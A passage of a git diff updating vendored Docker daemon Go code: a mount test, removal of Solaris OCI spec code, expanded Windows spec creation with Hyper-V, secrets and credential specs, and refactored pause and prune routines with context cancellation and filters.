checks that in case of IpcMode: private +// and ReadonlyRootfs: true (as in "docker run --ipc private --read-only") +// the resulting /dev/shm mount is NOT made read-only. +// https://github.com/moby/moby/issues/36503 +func TestIpcPrivateVsReadonly(t *testing.T) { + d := Daemon{ + // some empty structs to avoid getting a panic + // caused by a null pointer dereference + idMappings: &idtools.IDMappings{}, + configStore: &config.Config{}, + } + c := &container.Container{ + HostConfig: &containertypes.HostConfig{ + IpcMode: containertypes.IpcMode("private"), + ReadonlyRootfs: true, + }, + } + + // We can't call createSpec() so mimick the minimal part + // of its code flow, just enough to reproduce the issue. + ms, err := d.setupMounts(c) + assert.Check(t, err) + + s := oci.DefaultSpec() + s.Root.Readonly = c.HostConfig.ReadonlyRootfs + + err = setMounts(&d, &s, c, ms) + assert.Check(t, err) + + // Find the /dev/shm mount in ms, check it does not have ro + for _, m := range s.Mounts { + if m.Destination != "/dev/shm" { + continue + } + assert.Check(t, is.Equal(false, inSlice(m.Options, "ro"))) + } +} + +func TestGetSourceMount(t *testing.T) { + // must be able to find source mount for / + mnt, _, err := getSourceMount("/") + assert.NilError(t, err) + assert.Equal(t, mnt, "/") + + // must be able to find source mount for current directory + cwd, err := os.Getwd() + assert.NilError(t, err) + _, _, err = getSourceMount(cwd) + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/daemon/oci_solaris.go b/vendor/github.com/docker/docker/daemon/oci_solaris.go deleted file mode 100644 index 0c757f9196..0000000000 --- a/vendor/github.com/docker/docker/daemon/oci_solaris.go +++ /dev/null @@ -1,188 +0,0 @@ -package daemon - -import ( - "fmt" - "path/filepath" - "sort" - "strconv" - - containertypes "github.com/docker/docker/api/types/container" - "github.com/docker/docker/container" - "github.com/docker/docker/oci" - "github.com/docker/libnetwork" - "github.com/opencontainers/runtime-spec/specs-go" -) - -func setResources(s *specs.Spec, r containertypes.Resources) error { - mem := getMemoryResources(r) - s.Solaris.CappedMemory = &mem - - capCPU := getCPUResources(r) - s.Solaris.CappedCPU = &capCPU - - return nil -} - -func setUser(s *specs.Spec, c *container.Container) error { - uid, gid, additionalGids, err := getUser(c, c.Config.User) - if err != nil { - return err - } - s.Process.User.UID = uid - s.Process.User.GID = gid - s.Process.User.AdditionalGids = additionalGids - return nil -} - -func getUser(c *container.Container, username string) (uint32, uint32, []uint32, error) { - return 0, 0, nil, nil -} - -func (daemon *Daemon) getRunzAnet(ep libnetwork.Endpoint) (specs.Anet, error) { - var ( - linkName string - lowerLink string - defRouter string - ) - - epInfo := ep.Info() - if epInfo == nil { - return specs.Anet{}, fmt.Errorf("invalid endpoint") - } - - nw, err := daemon.GetNetworkByName(ep.Network()) - if err != nil { - return specs.Anet{}, fmt.Errorf("Failed to get network %s: %v", ep.Network(), err) - } - - // Evaluate default router, linkname and lowerlink for interface endpoint - switch nw.Type() { - case "bridge": - defRouter = epInfo.Gateway().String() - linkName = "net0" // Should always be net0 for a container - - // TODO We construct lowerlink here exactly as done for solaris bridge - // initialization. Need modular code to reuse. - options := nw.Info().DriverOptions() - nwName := options["com.docker.network.bridge.name"] - lastChar := nwName[len(nwName)-1:] - if _, err = strconv.Atoi(lastChar); err != nil { - lowerLink = nwName + "_0" - } else { - lowerLink = nwName - } - - case "overlay": - defRouter = "" - linkName = "net1" - - // TODO Follows generateVxlanName() in solaris overlay. - id := nw.ID() - if len(nw.ID()) > 12 { - id = nw.ID()[:12] - } - lowerLink = "vx_" + id + "_0" - } - - runzanet := specs.Anet{ - Linkname: linkName, - Lowerlink: lowerLink, - Allowedaddr: epInfo.Iface().Address().String(), - Configallowedaddr: "true", - Defrouter: defRouter, - Linkprotection: "mac-nospoof, ip-nospoof", - Macaddress: epInfo.Iface().MacAddress().String(), - } - - return runzanet, nil -} - -func (daemon *Daemon) setNetworkInterface(s *specs.Spec, c *container.Container) error { - var anets []specs.Anet - - sb, err := daemon.netController.SandboxByID(c.NetworkSettings.SandboxID) - if err != nil { - return fmt.Errorf("Could not obtain sandbox for container") - } - - // Populate interfaces required for each endpoint - for _, ep := range sb.Endpoints() { - runzanet, err := daemon.getRunzAnet(ep) - if err != nil { - return fmt.Errorf("Failed to get interface information for endpoint %d: %v", ep.ID(), err) - } - anets = append(anets, runzanet) - } - - s.Solaris.Anet = anets - if anets != nil { - s.Solaris.Milestone = "svc:/milestone/container:default" - } - return nil -} - -func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) error { - linkedEnv, err := daemon.setupLinkedContainers(c) - if err != nil { - return err - } - s.Root = specs.Root{ - Path: filepath.Dir(c.BaseFS), - Readonly: c.HostConfig.ReadonlyRootfs, - } - rootUID, rootGID := daemon.GetRemappedUIDGID() - if err := c.SetupWorkingDirectory(rootUID, rootGID); err != nil { - return err - } - cwd := c.Config.WorkingDir - s.Process.Args = append([]string{c.Path}, c.Args...) - s.Process.Cwd = cwd - s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv) - s.Process.Terminal = c.Config.Tty - s.Hostname = c.FullHostname() - - return nil -} - -func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { - s := oci.DefaultSpec() - if err := daemon.populateCommonSpec(&s, c); err != nil { - return nil, err - } - - if err := setResources(&s, c.HostConfig.Resources); err != nil { - return nil, fmt.Errorf("runtime spec resources: %v", err) - } - - if err := setUser(&s, c); err != nil { - return nil, fmt.Errorf("spec user: %v", err) - } - - if err := daemon.setNetworkInterface(&s, c); err != nil { - return nil, err - } - - if err := daemon.setupIpcDirs(c); err != nil { - return nil, err - } - - ms, err := daemon.setupMounts(c) - if err != nil { - return nil, err - } - ms = append(ms, c.IpcMounts()...) - tmpfsMounts, err := c.TmpfsMounts() - if err != nil { - return nil, err - } - ms = append(ms, tmpfsMounts...) - sort.Sort(mounts(ms)) - - return (*specs.Spec)(&s), nil -} - -// mergeUlimits merge the Ulimits from HostConfig with daemon defaults, and update HostConfig -// It will do nothing on non-Linux platform -func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) { - return -} diff --git a/vendor/github.com/docker/docker/daemon/oci_windows.go b/vendor/github.com/docker/docker/daemon/oci_windows.go index 6e264243b4..6279d7dd20 100644 --- a/vendor/github.com/docker/docker/daemon/oci_windows.go +++ b/vendor/github.com/docker/docker/daemon/oci_windows.go @@ -1,17 +1,35 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "syscall" + "fmt" + "io/ioutil" + "path/filepath" + "runtime" + "strings" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" "github.com/docker/docker/oci" "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/pkg/system" "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "golang.org/x/sys/windows" + "golang.org/x/sys/windows/registry" +) + +const ( + credentialSpecRegistryLocation = `SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\Containers\CredentialSpecs` + credentialSpecFileLocation = "CredentialSpecs" ) func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { - s := oci.DefaultSpec() + img, err := daemon.imageService.GetImage(string(c.ImageID)) + if err != nil { + return nil, err + } + + s := oci.DefaultOSSpec(img.OS) linkedEnv, err := daemon.setupLinkedContainers(c) if err != nil { @@ -25,11 +43,69 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { // In base spec s.Hostname = c.FullHostname() + if err := daemon.setupSecretDir(c); err != nil { + return nil, err + } + + if err := daemon.setupConfigDir(c); err != nil { + return nil, err + } + // In s.Mounts mounts, err := daemon.setupMounts(c) if err != nil { return nil, err } + + var isHyperV bool + if c.HostConfig.Isolation.IsDefault() { + // Container using default isolation, so take the default from the daemon configuration + isHyperV = daemon.defaultIsolation.IsHyperV() + } else { + // Container may be requesting an explicit isolation mode. + isHyperV = c.HostConfig.Isolation.IsHyperV() + } + + if isHyperV { + s.Windows.HyperV = &specs.WindowsHyperV{} + } + + // If the container has not been started, and has configs or secrets + // secrets, create symlinks to each config and secret. If it has been + // started before, the symlinks should have already been created. Also, it + // is important to not mount a Hyper-V container that has been started + // before, to protect the host from the container; for example, from + // malicious mutation of NTFS data structures. + if !c.HasBeenStartedBefore && (len(c.SecretReferences) > 0 || len(c.ConfigReferences) > 0) { + // The container file system is mounted before this function is called, + // except for Hyper-V containers, so mount it here in that case. + if isHyperV { + if err := daemon.Mount(c); err != nil { + return nil, err + } + defer daemon.Unmount(c) + } + if err := c.CreateSecretSymlinks(); err != nil { + return nil, err + } + if err := c.CreateConfigSymlinks(); err != nil { + return nil, err + } + } + + secretMounts, err := c.SecretMounts() + if err != nil { + return nil, err + } + if secretMounts != nil { + mounts = append(mounts, secretMounts...) + } + + configMounts := c.ConfigMounts() + if configMounts != nil { + mounts = append(mounts, configMounts...) + } + for _, mount := range mounts { m := specs.Mount{ Source: mount.Source, @@ -38,15 +114,115 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { if !mount.Writable { m.Options = append(m.Options, "ro") } + if img.OS != runtime.GOOS { + m.Type = "bind" + m.Options = append(m.Options, "rbind") + m.Options = append(m.Options, fmt.Sprintf("uvmpath=/tmp/gcs/%s/binds", c.ID)) + } s.Mounts = append(s.Mounts, m) } // In s.Process s.Process.Args = append([]string{c.Path}, c.Args...) - if !c.Config.ArgsEscaped { + if !c.Config.ArgsEscaped && img.OS == "windows" { s.Process.Args = escapeArgs(s.Process.Args) } + s.Process.Cwd = c.Config.WorkingDir + s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv) + if c.Config.Tty { + s.Process.Terminal = c.Config.Tty + s.Process.ConsoleSize = &specs.Box{ + Height: c.HostConfig.ConsoleSize[0], + Width: c.HostConfig.ConsoleSize[1], + } + } + s.Process.User.Username = c.Config.User + s.Windows.LayerFolders, err = daemon.imageService.GetLayerFolders(img, c.RWLayer) + if err != nil { + return nil, errors.Wrapf(err, "container %s", c.ID) + } + + dnsSearch := daemon.getDNSSearchSettings(c) + + // Get endpoints for the libnetwork allocated networks to the container + var epList []string + AllowUnqualifiedDNSQuery := false + gwHNSID := "" + if c.NetworkSettings != nil { + for n := range c.NetworkSettings.Networks { + sn, err := daemon.FindNetwork(n) + if err != nil { + continue + } + + ep, err := getEndpointInNetwork(c.Name, sn) + if err != nil { + continue + } + + data, err := ep.DriverInfo() + if err != nil { + continue + } + + if data["GW_INFO"] != nil { + gwInfo := data["GW_INFO"].(map[string]interface{}) + if gwInfo["hnsid"] != nil { + gwHNSID = gwInfo["hnsid"].(string) + } + } + + if data["hnsid"] != nil { + epList = append(epList, data["hnsid"].(string)) + } + + if data["AllowUnqualifiedDNSQuery"] != nil { + AllowUnqualifiedDNSQuery = true + } + } + } + + var networkSharedContainerID string + if c.HostConfig.NetworkMode.IsContainer() { + networkSharedContainerID = c.NetworkSharedContainerID + for _, ep := range c.SharedEndpointList { + epList = append(epList, ep) + } + } + + if gwHNSID != "" { + epList = append(epList, gwHNSID) + } + + s.Windows.Network = &specs.WindowsNetwork{ + AllowUnqualifiedDNSQuery: AllowUnqualifiedDNSQuery, + DNSSearchList: dnsSearch, + EndpointList: epList, + NetworkSharedContainerName: networkSharedContainerID, + } + + switch img.OS { + case "windows": + if err := daemon.createSpecWindowsFields(c, &s, isHyperV); err != nil { + return nil, err + } + case "linux": + if !system.LCOWSupported() { + return nil, fmt.Errorf("Linux containers on Windows are not supported") + } + if err := daemon.createSpecLinuxFields(c, &s); err != nil { + return nil, err + } + default: + return nil, fmt.Errorf("Unsupported platform %q", img.OS) + } + + return (*specs.Spec)(&s), nil +} + +// Sets the Windows-specific fields of the OCI spec +func (daemon *Daemon) createSpecWindowsFields(c *container.Container, s *specs.Spec, isHyperV bool) error { if len(s.Process.Cwd) == 0 { // We default to C:\ to workaround the oddity of the case that the // default directory for cmd running as LocalSystem (or @@ -57,60 +233,132 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { // as c:\. Hence, setting it to default of c:\ makes for consistency. s.Process.Cwd = `C:\` } - s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv) - s.Process.ConsoleSize.Height = c.HostConfig.ConsoleSize[0] - s.Process.ConsoleSize.Width = c.HostConfig.ConsoleSize[1] - s.Process.Terminal = c.Config.Tty - s.Process.User.Username = c.Config.User - // In spec.Root. This is not set for Hyper-V containers - isHyperV := false - if c.HostConfig.Isolation.IsDefault() { - // Container using default isolation, so take the default from the daemon configuration - isHyperV = daemon.defaultIsolation.IsHyperV() - } else { - // Container may be requesting an explicit isolation mode. - isHyperV = c.HostConfig.Isolation.IsHyperV() - } + s.Root.Readonly = false // Windows does not support a read-only root filesystem if !isHyperV { - s.Root.Path = c.BaseFS + if c.BaseFS == nil { + return errors.New("createSpecWindowsFields: BaseFS of container " + c.ID + " is unexpectedly nil") + } + + s.Root.Path = c.BaseFS.Path() // This is not set for Hyper-V containers + if !strings.HasSuffix(s.Root.Path, `\`) { + s.Root.Path = s.Root.Path + `\` // Ensure a correctly formatted volume GUID path \\?\Volume{GUID}\ + } } - s.Root.Readonly = false // Windows does not support a read-only root filesystem + + // First boot optimization + s.Windows.IgnoreFlushesDuringBoot = !c.HasBeenStartedBefore // In s.Windows.Resources - // @darrenstahlmsft implement these resources cpuShares := uint16(c.HostConfig.CPUShares) - cpuPercent := uint8(c.HostConfig.CPUPercent) + cpuMaximum := uint16(c.HostConfig.CPUPercent) * 100 + cpuCount := uint64(c.HostConfig.CPUCount) if c.HostConfig.NanoCPUs > 0 { - cpuPercent = uint8(c.HostConfig.NanoCPUs * 100 / int64(sysinfo.NumCPU()) / 1e9) + if isHyperV { + cpuCount = uint64(c.HostConfig.NanoCPUs / 1e9) + leftoverNanoCPUs := c.HostConfig.NanoCPUs % 1e9 + if leftoverNanoCPUs != 0 { + cpuCount++ + cpuMaximum = uint16(c.HostConfig.NanoCPUs / int64(cpuCount) / (1e9 / 10000)) + if cpuMaximum < 1 { + // The requested NanoCPUs is so small that we rounded to 0, use 1 instead + cpuMaximum = 1 + } + } + } else { + cpuMaximum = uint16(c.HostConfig.NanoCPUs / int64(sysinfo.NumCPU()) / (1e9 / 10000)) + if cpuMaximum < 1 { + // The requested NanoCPUs is so small that we rounded to 0, use 1 instead + cpuMaximum = 1 + } + } } - cpuCount := uint64(c.HostConfig.CPUCount) memoryLimit := uint64(c.HostConfig.Memory) s.Windows.Resources = &specs.WindowsResources{ CPU: &specs.WindowsCPUResources{ - Percent: &cpuPercent, + Maximum: &cpuMaximum, Shares: &cpuShares, Count: &cpuCount, }, Memory: &specs.WindowsMemoryResources{ Limit: &memoryLimit, - //TODO Reservation: ..., - }, - Network: &specs.WindowsNetworkResources{ - //TODO Bandwidth: ..., }, Storage: &specs.WindowsStorageResources{ Bps: &c.HostConfig.IOMaximumBandwidth, Iops: &c.HostConfig.IOMaximumIOps, }, } - return (*specs.Spec)(&s), nil + + // Read and add credentials from the security options if a credential spec has been provided. + if c.HostConfig.SecurityOpt != nil { + cs := "" + for _, sOpt := range c.HostConfig.SecurityOpt { + sOpt = strings.ToLower(sOpt) + if !strings.Contains(sOpt, "=") { + return fmt.Errorf("invalid security option: no equals sign in supplied value %s", sOpt) + } + var splitsOpt []string + splitsOpt = strings.SplitN(sOpt, "=", 2) + if len(splitsOpt) != 2 { + return fmt.Errorf("invalid security option: %s", sOpt) + } + if splitsOpt[0] != "credentialspec" { + return fmt.Errorf("security option not supported: %s", splitsOpt[0]) + } + + var ( + match bool + csValue string + err error + ) + if match, csValue = getCredentialSpec("file://", splitsOpt[1]); match { + if csValue == "" { + return fmt.Errorf("no value supplied for file:// credential spec security option") + } + if cs, err = readCredentialSpecFile(c.ID, daemon.root, filepath.Clean(csValue)); err != nil { + return err + } + } else if match, csValue = getCredentialSpec("registry://", splitsOpt[1]); match { + if csValue == "" { + return fmt.Errorf("no value supplied for registry:// credential spec security option") + } + if cs, err = readCredentialSpecRegistry(c.ID, csValue); err != nil { + return err + } + } else { + return fmt.Errorf("invalid credential spec security option - value must be prefixed file:// or registry:// followed by a value") + } + } + s.Windows.CredentialSpec = cs + } + + return nil +} + +// Sets the Linux-specific fields of the OCI spec +// TODO: @jhowardmsft LCOW Support. We need to do a lot more pulling in what can +// be pulled in from oci_linux.go. +func (daemon *Daemon) createSpecLinuxFields(c *container.Container, s *specs.Spec) error { + if len(s.Process.Cwd) == 0 { + s.Process.Cwd = `/` + } + s.Root.Path = "rootfs" + s.Root.Readonly = c.HostConfig.ReadonlyRootfs + if err := setCapabilities(s, c); err != nil { + return fmt.Errorf("linux spec capabilities: %v", err) + } + devPermissions, err := appendDevicePermissionsFromCgroupRules(nil, c.HostConfig.DeviceCgroupRules) + if err != nil { + return fmt.Errorf("linux runtime spec devices: %v", err) + } + s.Linux.Resources.Devices = devPermissions + return nil } func escapeArgs(args []string) []string { escapedArgs := make([]string, len(args)) for i, a := range args { - escapedArgs[i] = syscall.EscapeArg(a) + escapedArgs[i] = windows.EscapeArg(a) } return escapedArgs } @@ -120,3 +368,52 @@ func escapeArgs(args []string) []string { func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) { return } + +// getCredentialSpec is a helper function to get the value of a credential spec supplied +// on the CLI, stripping the prefix +func getCredentialSpec(prefix, value string) (bool, string) { + if strings.HasPrefix(value, prefix) { + return true, strings.TrimPrefix(value, prefix) + } + return false, "" +} + +// readCredentialSpecRegistry is a helper function to read a credential spec from +// the registry. If not found, we return an empty string and warn in the log. +// This allows for staging on machines which do not have the necessary components. +func readCredentialSpecRegistry(id, name string) (string, error) { + var ( + k registry.Key + err error + val string + ) + if k, err = registry.OpenKey(registry.LOCAL_MACHINE, credentialSpecRegistryLocation, registry.QUERY_VALUE); err != nil { + return "", fmt.Errorf("failed handling spec %q for container %s - %s could not be opened", name, id, credentialSpecRegistryLocation) + } + if val, _, err = k.GetStringValue(name); err != nil { + if err == registry.ErrNotExist { + return "", fmt.Errorf("credential spec %q for container %s as it was not found", name, id) + } + return "", fmt.Errorf("error %v reading credential spec %q from registry for container %s", err, name, id) + } + return val, nil +} + +// readCredentialSpecFile is a helper function to read a credential spec from +// a file. If not found, we return an empty string and warn in the log. +// This allows for staging on machines which do not have the necessary components. +func readCredentialSpecFile(id, root, location string) (string, error) { + if filepath.IsAbs(location) { + return "", fmt.Errorf("invalid credential spec - file:// path cannot be absolute") + } + base := filepath.Join(root, credentialSpecFileLocation) + full := filepath.Join(base, location) + if !strings.HasPrefix(full, base) { + return "", fmt.Errorf("invalid credential spec - file:// path must be under %s", base) + } + bcontents, err := ioutil.ReadFile(full) + if err != nil { + return "", fmt.Errorf("credential spec '%s' for container %s as the file could not be read: %q", full, id, err) + } + return string(bcontents[:]), nil +} diff --git a/vendor/github.com/docker/docker/daemon/pause.go b/vendor/github.com/docker/docker/daemon/pause.go index dbfafbc5fd..be6ec1b92a 100644 --- a/vendor/github.com/docker/docker/daemon/pause.go +++ b/vendor/github.com/docker/docker/daemon/pause.go @@ -1,9 +1,11 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "github.com/docker/docker/container" + "github.com/sirupsen/logrus" ) // ContainerPause pauses a container @@ -12,12 +14,7 @@ func (daemon *Daemon) ContainerPause(name string) error { if err != nil { return err } - - if err := daemon.containerPause(container); err != nil { - return err - } - - return nil + return daemon.containerPause(container) } // containerPause pauses the container execution without stopping the process. @@ -28,12 +25,12 @@ func (daemon *Daemon) containerPause(container *container.Container) error { // We cannot Pause the container which is not running if !container.Running { - return errNotRunning{container.ID} + return errNotRunning(container.ID) } // We cannot Pause the container which is already paused if container.Paused { - return fmt.Errorf("Container %s is already paused", container.ID) + return errNotPaused(container.ID) } // We cannot Pause the container which is restarting @@ -41,9 +38,18 @@ func (daemon *Daemon) containerPause(container *container.Container) error { return errContainerIsRestarting(container.ID) } - if err := daemon.containerd.Pause(container.ID); err != nil { + if err := daemon.containerd.Pause(context.Background(), container.ID); err != nil { return fmt.Errorf("Cannot pause container %s: %s", container.ID, err) } + container.Paused = true + daemon.setStateCounter(container) + daemon.updateHealthMonitor(container) + daemon.LogContainerEvent(container, "pause") + + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + logrus.WithError(err).Warn("could not save container to disk") + } + return nil } diff --git a/vendor/github.com/docker/docker/daemon/prune.go b/vendor/github.com/docker/docker/daemon/prune.go index a693beb4e1..b690f2e552 100644 --- a/vendor/github.com/docker/docker/daemon/prune.go +++ b/vendor/github.com/docker/docker/daemon/prune.go @@ -1,165 +1,87 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "regexp" + "sync/atomic" + "time" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/image" - "github.com/docker/docker/layer" - "github.com/docker/docker/pkg/directory" - "github.com/docker/docker/reference" + timetypes "github.com/docker/docker/api/types/time" + "github.com/docker/docker/errdefs" "github.com/docker/docker/runconfig" - "github.com/docker/docker/volume" "github.com/docker/libnetwork" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) -// ContainersPrune removes unused containers -func (daemon *Daemon) ContainersPrune(pruneFilters filters.Args) (*types.ContainersPruneReport, error) { - rep := &types.ContainersPruneReport{} +var ( + // errPruneRunning is returned when a prune request is received while + // one is in progress + errPruneRunning = errdefs.Conflict(errors.New("a prune operation is already running")) - allContainers := daemon.List() - for _, c := range allContainers { - if !c.IsRunning() { - cSize, _ := daemon.getSize(c) - // TODO: sets RmLink to true? - err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{}) - if err != nil { - logrus.Warnf("failed to prune container %s: %v", c.ID, err) - continue - } - if cSize > 0 { - rep.SpaceReclaimed += uint64(cSize) - } - rep.ContainersDeleted = append(rep.ContainersDeleted, c.ID) - } + containersAcceptedFilters = map[string]bool{ + "label": true, + "label!": true, + "until": true, } - return rep, nil -} - -// VolumesPrune removes unused local volumes -func (daemon *Daemon) VolumesPrune(pruneFilters filters.Args) (*types.VolumesPruneReport, error) { - rep := &types.VolumesPruneReport{} - - pruneVols := func(v volume.Volume) error { - name := v.Name() - refs := daemon.volumes.Refs(v) - - if len(refs) == 0 { - vSize, err := directory.Size(v.Path()) - if err != nil { - logrus.Warnf("could not determine size of volume %s: %v", name, err) - } - err = daemon.volumes.Remove(v) - if err != nil { - logrus.Warnf("could not remove volume %s: %v", name, err) - return nil - } - rep.SpaceReclaimed += uint64(vSize) - rep.VolumesDeleted = append(rep.VolumesDeleted, name) - } - - return nil + networksAcceptedFilters = map[string]bool{ + "label": true, + "label!": true, + "until": true, } +) - err := daemon.traverseLocalVolumes(pruneVols) - - return rep, err -} +// ContainersPrune removes unused containers +func (daemon *Daemon) ContainersPrune(ctx context.Context, pruneFilters filters.Args) (*types.ContainersPruneReport, error) { + if !atomic.CompareAndSwapInt32(&daemon.pruneRunning, 0, 1) { + return nil, errPruneRunning + } + defer atomic.StoreInt32(&daemon.pruneRunning, 0) -// ImagesPrune removes unused images -func (daemon *Daemon) ImagesPrune(pruneFilters filters.Args) (*types.ImagesPruneReport, error) { - rep := &types.ImagesPruneReport{} + rep := &types.ContainersPruneReport{} - danglingOnly := true - if pruneFilters.Include("dangling") { - if pruneFilters.ExactMatch("dangling", "false") || pruneFilters.ExactMatch("dangling", "0") { - danglingOnly = false - } else if !pruneFilters.ExactMatch("dangling", "true") && !pruneFilters.ExactMatch("dangling", "1") { - return nil, fmt.Errorf("Invalid filter 'dangling=%s'", pruneFilters.Get("dangling")) - } + // make sure that only accepted filters have been received + err := pruneFilters.Validate(containersAcceptedFilters) + if err != nil { + return nil, err } - var allImages map[image.ID]*image.Image - if danglingOnly { - allImages = daemon.imageStore.Heads() - } else { - allImages = daemon.imageStore.Map() + until, err := getUntilFromPruneFilters(pruneFilters) + if err != nil { + return nil, err } + allContainers := daemon.List() - imageRefs := map[string]bool{} for _, c := range allContainers { - imageRefs[c.ID] = true - } - - // Filter intermediary images and get their unique size - allLayers := daemon.layerStore.Map() - topImages := map[image.ID]*image.Image{} - for id, img := range allImages { - dgst := digest.Digest(id) - if len(daemon.referenceStore.References(dgst)) == 0 && len(daemon.imageStore.Children(id)) != 0 { - continue + select { + case <-ctx.Done(): + logrus.Debugf("ContainersPrune operation cancelled: %#v", *rep) + return rep, nil + default: } - topImages[id] = img - } - for id := range topImages { - dgst := digest.Digest(id) - hex := dgst.Hex() - if _, ok := imageRefs[hex]; ok { - continue - } - - deletedImages := []types.ImageDelete{} - refs := daemon.referenceStore.References(dgst) - if len(refs) > 0 { - if danglingOnly { - // Not a dangling image + if !c.IsRunning() { + if !until.IsZero() && c.Created.After(until) { continue } - - nrRefs := len(refs) - for _, ref := range refs { - // If nrRefs == 1, we have an image marked as myreponame: - // i.e. the tag content was changed - if _, ok := ref.(reference.Canonical); ok && nrRefs > 1 { - continue - } - imgDel, err := daemon.ImageDelete(ref.String(), false, true) - if err != nil { - logrus.Warnf("could not delete reference %s: %v", ref.String(), err) - continue - } - deletedImages = append(deletedImages, imgDel...) + if !matchLabels(pruneFilters, c.Config.Labels) { + continue } - } else { - imgDel, err := daemon.ImageDelete(hex, false, true) + cSize, _ := daemon.imageService.GetContainerLayerSize(c.ID) + // TODO: sets RmLink to true? + err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{}) if err != nil { - logrus.Warnf("could not delete image %s: %v", hex, err) + logrus.Warnf("failed to prune container %s: %v", c.ID, err) continue } - deletedImages = append(deletedImages, imgDel...) - } - - rep.ImagesDeleted = append(rep.ImagesDeleted, deletedImages...) - } - - // Compute how much space was freed - for _, d := range rep.ImagesDeleted { - if d.Deleted != "" { - chid := layer.ChainID(d.Deleted) - if l, ok := allLayers[chid]; ok { - diffSize, err := l.DiffSize() - if err != nil { - logrus.Warnf("failed to get layer %s size: %v", chid, err) - continue - } - rep.SpaceReclaimed += uint64(diffSize) + if cSize > 0 { + rep.SpaceReclaimed += uint64(cSize) } + rep.ContainersDeleted = append(rep.ContainersDeleted, c.ID) } } @@ -167,70 +89,162 @@ func (daemon *Daemon) ImagesPrune(pruneFilters filters.Args) (*types.ImagesPrune } // localNetworksPrune removes unused local networks -func (daemon *Daemon) localNetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) { +func (daemon *Daemon) localNetworksPrune(ctx context.Context, pruneFilters filters.Args) *types.NetworksPruneReport { rep := &types.NetworksPruneReport{} - var err error + + until, _ := getUntilFromPruneFilters(pruneFilters) + // When the function returns true, the walk will stop. l := func(nw libnetwork.Network) bool { + select { + case <-ctx.Done(): + // context cancelled + return true + default: + } + if nw.Info().ConfigOnly() { + return false + } + if !until.IsZero() && nw.Info().Created().After(until) { + return false + } + if !matchLabels(pruneFilters, nw.Info().Labels()) { + return false + } nwName := nw.Name() - predefined := runconfig.IsPreDefinedNetwork(nwName) - if !predefined && len(nw.Endpoints()) == 0 { - if err = daemon.DeleteNetwork(nw.ID()); err != nil { - logrus.Warnf("could not remove network %s: %v", nwName, err) - return false - } - rep.NetworksDeleted = append(rep.NetworksDeleted, nwName) + if runconfig.IsPreDefinedNetwork(nwName) { + return false } + if len(nw.Endpoints()) > 0 { + return false + } + if err := daemon.DeleteNetwork(nw.ID()); err != nil { + logrus.Warnf("could not remove local network %s: %v", nwName, err) + return false + } + rep.NetworksDeleted = append(rep.NetworksDeleted, nwName) return false } daemon.netController.WalkNetworks(l) - return rep, err + return rep } // clusterNetworksPrune removes unused cluster networks -func (daemon *Daemon) clusterNetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) { +func (daemon *Daemon) clusterNetworksPrune(ctx context.Context, pruneFilters filters.Args) (*types.NetworksPruneReport, error) { rep := &types.NetworksPruneReport{} + + until, _ := getUntilFromPruneFilters(pruneFilters) + cluster := daemon.GetCluster() + + if !cluster.IsManager() { + return rep, nil + } + networks, err := cluster.GetNetworks() if err != nil { return rep, err } networkIsInUse := regexp.MustCompile(`network ([[:alnum:]]+) is in use`) for _, nw := range networks { - if nw.Name == "ingress" { - continue - } - // https://github.com/docker/docker/issues/24186 - // `docker network inspect` unfortunately displays ONLY those containers that are local to that node. - // So we try to remove it anyway and check the error - err = cluster.RemoveNetwork(nw.ID) - if err != nil { - // we can safely ignore the "network .. is in use" error - match := networkIsInUse.FindStringSubmatch(err.Error()) - if len(match) != 2 || match[1] != nw.ID { - logrus.Warnf("could not remove network %s: %v", nw.Name, err) + select { + case <-ctx.Done(): + return rep, nil + default: + if nw.Ingress { + // Routing-mesh network removal has to be explicitly invoked by user + continue } - continue + if !until.IsZero() && nw.Created.After(until) { + continue + } + if !matchLabels(pruneFilters, nw.Labels) { + continue + } + // https://github.com/docker/docker/issues/24186 + // `docker network inspect` unfortunately displays ONLY those containers that are local to that node. + // So we try to remove it anyway and check the error + err = cluster.RemoveNetwork(nw.ID) + if err != nil { + // we can safely ignore the "network .. is in use" error + match := networkIsInUse.FindStringSubmatch(err.Error()) + if len(match) != 2 || match[1] != nw.ID { + logrus.Warnf("could not remove cluster network %s: %v", nw.Name, err) + } + continue + } + rep.NetworksDeleted = append(rep.NetworksDeleted, nw.Name) } - rep.NetworksDeleted = append(rep.NetworksDeleted, nw.Name) } return rep, nil } // NetworksPrune removes unused networks -func (daemon *Daemon) NetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) { - rep := &types.NetworksPruneReport{} - clusterRep, err := daemon.clusterNetworksPrune(pruneFilters) +func (daemon *Daemon) NetworksPrune(ctx context.Context, pruneFilters filters.Args) (*types.NetworksPruneReport, error) { + if !atomic.CompareAndSwapInt32(&daemon.pruneRunning, 0, 1) { + return nil, errPruneRunning + } + defer atomic.StoreInt32(&daemon.pruneRunning, 0) + + // make sure that only 